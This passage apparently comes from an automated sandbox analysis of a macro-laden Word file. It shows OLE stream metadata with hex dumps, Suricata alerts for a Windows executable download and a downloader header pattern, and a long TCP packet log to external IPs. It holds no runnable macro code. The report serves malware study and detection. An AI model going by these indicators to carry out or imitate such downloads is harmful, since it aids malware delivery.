                                                                                                                                                                                                                                Data ASCII:. . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6
                                                                                                                                                                                                                                Data Raw:1e 06 0f 00 12 00 01 00 78 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00
                                                                                                                                                                                                                                Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 598
                                                                                                                                                                                                                                General
                                                                                                                                                                                                                                Stream Path:Macros/PROJECT
                                                                                                                                                                                                                                CLSID:
                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                Stream Size:598
                                                                                                                                                                                                                                Entropy:5.2911106056391715
                                                                                                                                                                                                                                Base64 Encoded:True
                                                                                                                                                                                                                                Data ASCII:I D = " { 6 A C 5 3 0 6 E - 9 2 8 F - 4 D 3 0 - A C 3 1 - 2 8 1 A D 3 0 6 9 D D 1 } " . . D o c u m e n t = k s k s k s k s k s k s k s / & H 0 0 0 0 0 0 0 0 . . M o d u l e = M o d u l e 3 . . C l a s s = V i e w S e s s i o n . . M o d u l e = M o d u l e 1 . . M o d u l e = M o d u l e 2 . . H e l p F i l e = " 1 0 0 7 4 6 3 5 0 " . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " D 5 D 7 0 5 2 2 0 F A 3 1
                                                                                                                                                                                                                                Data Raw:49 44 3d 22 7b 36 41 43 35 33 30 36 45 2d 39 32 38 46 2d 34 44 33 30 2d 41 43 33 31 2d 32 38 31 41 44 33 30 36 39 44 44 31 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 6b 73 6b 73 6b 73 6b 73 6b 73 6b 73 6b 73 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 4d 6f 64 75 6c 65 33 0d 0a 43 6c 61 73 73 3d 56 69 65 77 53 65 73 73 69 6f 6e 0d 0a 4d 6f 64 75 6c 65 3d 4d 6f 64 75 6c
                                                                                                                                                                                                                                Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 155
                                                                                                                                                                                                                                General
                                                                                                                                                                                                                                Stream Path:Macros/PROJECTwm
                                                                                                                                                                                                                                CLSID:
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Stream Size:155
                                                                                                                                                                                                                                Entropy:3.107165469264921
                                                                                                                                                                                                                                Base64 Encoded:False
                                                                                                                                                                                                                                Data ASCII:k s k s k s k s k s k s k s . k . s . k . s . k . s . k . s . k . s . k . s . k . s . . . M o d u l e 3 . M . o . d . u . l . e . 3 . . . V i e w S e s s i o n . V . i . e . w . S . e . s . s . i . o . n . . . M o d u l e 1 . M . o . d . u . l . e . 1 . . . M o d u l e 2 . M . o . d . u . l . e . 2 . . . . .
                                                                                                                                                                                                                                Data Raw:6b 73 6b 73 6b 73 6b 73 6b 73 6b 73 6b 73 00 6b 00 73 00 6b 00 73 00 6b 00 73 00 6b 00 73 00 6b 00 73 00 6b 00 73 00 6b 00 73 00 00 00 4d 6f 64 75 6c 65 33 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 33 00 00 00 56 69 65 77 53 65 73 73 69 6f 6e 00 56 00 69 00 65 00 77 00 53 00 65 00 73 00 73 00 69 00 6f 00 6e 00 00 00 4d 6f 64 75 6c 65 31 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 31 00 00
                                                                                                                                                                                                                                Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 8089
                                                                                                                                                                                                                                General
                                                                                                                                                                                                                                Stream Path:Macros/VBA/_VBA_PROJECT
                                                                                                                                                                                                                                CLSID:
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Stream Size:8089
                                                                                                                                                                                                                                Entropy:5.662084075475776
                                                                                                                                                                                                                                Base64 Encoded:True
                                                                                                                                                                                                                                Data ASCII:a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D .
                                                                                                                                                                                                                                Data Raw:cc 61 b5 00 00 03 00 ff 09 04 00 00 09 04 00 00 e4 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                                                                                                                                                                                                                                Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 653
                                                                                                                                                                                                                                General
                                                                                                                                                                                                                                Stream Path:Macros/VBA/dir
                                                                                                                                                                                                                                CLSID:
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Stream Size:653
                                                                                                                                                                                                                                Entropy:6.421648833038081
                                                                                                                                                                                                                                Base64 Encoded:True
                                                                                                                                                                                                                                Data ASCII:. . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . P r o j e c t . Q . ( . . @ . . . . ? . . = . . . . . . < . . . . . . . r i . . . . r < . . . . . . . s t d o l e > . . . s . t . d . o . l . e . . . h . . . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . 0 . . E N o r ( m a l E N C r . m . a F . . . b . . * \\ C . . . . 3 . m . . ! O f f i " c g O . f . i . * c g
                                                                                                                                                                                                                                Data Raw:01 89 b2 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 a8 3f b5 00 00 3d 06 12 07 02 12 01 3c 08 06 12 02 09 02 12 8c da 72 69 0a 00 8a 0c 02 72 3c 02 0a 16 00 06 00 07 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 1d 02 5e 00 03 2a 5c
                                                                                                                                                                                                                                Stream Path: WordDocument, File Type: data, Stream Size: 4096
                                                                                                                                                                                                                                General
                                                                                                                                                                                                                                Stream Path:WordDocument
                                                                                                                                                                                                                                CLSID:
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Stream Size:4096
                                                                                                                                                                                                                                Entropy:1.0834551557408363
                                                                                                                                                                                                                                Base64 Encoded:False
                                                                                                                                                                                                                                Data ASCII:. = . . . . . . . . . . . . . . . . . . . . . * . . . . . b j b j . . . . . . . . . . . . . . . . . . . . . . . . . . . . L h L h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ! . . . t . . . . . . . . . .
                                                                                                                                                                                                                                Data Raw:ec a5 c1 00 3d 00 09 04 00 00 f0 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 2a 08 00 00 0e 00 62 6a 62 6a 2e 97 2e 97 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 04 16 00 2e 0e 00 00 4c fd cd 68 4c fd cd 68 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

                                                                                                                                                                                                                                Network Behavior

                                                                                                                                                                                                                                Suricata IDS Alerts

                                                                                                                                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                2025-01-14T15:43:49.691091+01002022640ET MALWARE PE EXE or DLL Windows file download Text M21172.65.251.78443192.168.2.1049713TCP
                                                                                                                                                                                                                                2025-01-14T15:47:13.294323+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.1049735208.95.112.180TCP
                                                                                                                                                                                                                                2025-01-14T15:47:14.638099+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.1049735208.95.112.180TCP

                                                                                                                                                                                                                                Network Port Distribution

                                                                                                                                                                                                                                TCP Packets

                                                                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                Jan 14, 2025 15:43:48.949196100 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:48.949222088 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:48.949485064 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:48.950010061 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:48.950025082 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.422768116 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.422856092 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.444566011 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.444607973 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.445097923 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.445367098 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.446845055 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.487375021 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.583451033 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.583487034 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.583560944 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.583564997 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.583576918 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.583610058 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.583630085 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.583638906 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.583647966 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.583683014 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.584022045 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.584073067 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.584172964 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.584228992 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.584355116 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.584409952 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.584413052 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.584419966 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.584578991 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.588167906 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.588846922 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.588859081 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.588984966 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.688915968 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.688975096 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.689002991 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.689022064 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.689033985 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.689064026 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.689078093 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.689086914 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.689189911 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.689194918 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.689368010 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.689429998 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.689471960 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.689506054 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.689511061 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.689521074 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.689676046 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.689681053 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.689750910 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.690046072 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.690098047 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.690139055 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.690154076 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.690160036 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.690174103 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.690196037 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.690202951 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.690203905 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.690212011 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.690232038 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.690256119 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.691028118 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.691063881 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.691071987 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.691101074 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.691134930 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.691143036 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.691148996 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.691174984 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.691184044 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.691204071 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.691207886 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.691229105 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.691253901 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.691886902 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.691941977 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.691982985 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.691989899 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.692938089 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.811543941 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.811624050 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.811749935 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.811798096 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.812048912 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.812112093 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.812185049 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.812275887 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.812336922 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.812345982 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.812391996 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.812396049 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.812408924 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.812446117 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.812458992 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.812495947 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.812547922 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.812614918 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.812670946 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.812705994 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.812753916 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.813186884 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.813287020 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.813330889 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.813330889 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.813344002 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.813390970 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.813397884 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.813421011 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.813437939 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.813522100 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.813585043 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.813646078 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.813683987 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.813739061 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.813771963 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.813827038 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.813848972 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.813921928 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.899086952 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.899241924 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.899293900 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.899346113 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.899450064 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.899494886 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.899501085 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.899513960 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.899533987 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.899540901 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.899563074 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.899568081 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.899591923 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.899615049 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.899821997 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.899862051 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.900021076 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.900074005 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.900080919 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.900109053 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.900130987 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.900135994 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.900150061 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.900182009 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.900326967 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.900376081 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.900445938 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.900513887 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.900540113 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.900578976 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.900582075 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.900590897 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.900624037 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.901086092 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.901114941 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.901134968 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.901144981 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.901179075 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.901196003 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.901272058 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.901318073 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.901324987 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.901355028 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.901365995 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.901371002 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.901398897 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.901417971 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.901988983 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.902021885 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.902055979 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.902064085 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.902086973 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.902097940 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.902120113 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.902124882 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.902134895 CET44349713172.65.251.78192.168.2.10
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.902165890 CET49713443192.168.2.10172.65.251.78
                                                                                                                                                                                                                                Jan 14, 2025 15:43:49.902174950 CET44349713172.65.251.78192.168.2.10
